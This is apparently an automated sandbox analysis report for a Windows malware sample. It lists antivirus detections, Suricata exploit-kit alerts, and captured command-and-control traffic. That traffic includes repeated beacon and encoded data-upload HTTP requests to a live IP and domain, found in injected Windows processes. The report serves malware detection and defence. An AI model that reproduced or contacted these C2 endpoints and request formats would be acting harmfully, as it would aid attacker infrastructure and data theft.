2025-01-02T09:29:24.663598+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49956	47.76.199.218	80	TCP
2025-01-02T09:29:30.062263+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49987	47.76.199.218	80	TCP
2025-01-02T09:29:35.492858+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49988	47.76.199.218	80	TCP
2025-01-02T09:29:40.889568+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49989	47.76.199.218	80	TCP
2025-01-02T09:29:51.235726+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49992	47.76.199.218	80	TCP
2025-01-02T09:29:56.827496+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49993	47.76.199.218	80	TCP
2025-01-02T09:30:02.466649+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49994	47.76.199.218	80	TCP
2025-01-02T09:30:07.874318+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49995	47.76.199.218	80	TCP
2025-01-02T09:30:20.103478+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49997	47.76.199.218	80	TCP
2025-01-02T09:30:25.498305+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49998	47.76.199.218	80	TCP
2025-01-02T09:30:30.908500+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49999	47.76.199.218	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1731043030539.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 1731043030539.exe	Virustotal: Detection: 61%			Perma Link
Source: 1731043030539.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1731043030539.exe

Joe Sandbox ML: detected

Source: 1731043030539.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: F:\8QProject\process_x64\x64\Release\process_x64_dll.pdb source: 1731043030539.exe

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_00000001800024D0 FindFirstFileA,_time64,FindNextFileA,wsprintfA,FindNextFileA,

1_2_00000001800024D0

Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfmBM8ui63qGw1hOYc0Maww2aCZlGFx2cWqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfbfRmwgZ5cGzSvaFX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoVOv87GDYU96jq0srfmNJL5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pNJsxbItKeA*DsMEI= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRBSycwp2sHLkgahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3NM3WaD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjBW1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZsdrjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PXFHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85

Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49707 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49706 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49712 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49705 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49780 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49815 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49850 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49883 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49956 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49987 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49993 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49989 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49988 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49998 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49999 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49992 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49994 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49995 -> 47.76.199.218:80
Source: Network traffic	Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49997 -> 47.76.199.218:80

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\control.exe

Code function: 3_2_1001D145 recvfrom,WSAGetLastError,_memcmp,sendto,inet_ntoa,closesocket,

3_2_1001D145

Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfmBM8ui63qGw1hOYc0Maww2aCZlGFx2cWqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfbfRmwgZ5cGzSvaFX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoVOv87GDYU96jq0srfmNJL5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pNJsxbItKeA*DsMEI= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRBSycwp2sHLkgahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3NM3WaD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjBW1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZsdrjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PXFHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
Source: global traffic	HTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85

Source: global traffic

DNS traffic detected: DNS query: api.5566331.com

Source: raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218
Source: fontview.exe, 00000006.00000002.3293216939.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358
Source: resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358
Source: BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A99000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358
Source: raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358
Source: control.exe, 00000003.00000002.3293163076.0000000002E84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=
Source: fontview.exe, 00000006.00000002.3293216939.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=
Source: resmon.exe, 00000008.00000002.3293228985.0000000002888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=
Source: BackgroundTransferHost.exe, 00000009.00000003.3183748550.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=
Source: control.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.76.199.218om
Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000002.3292960857.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
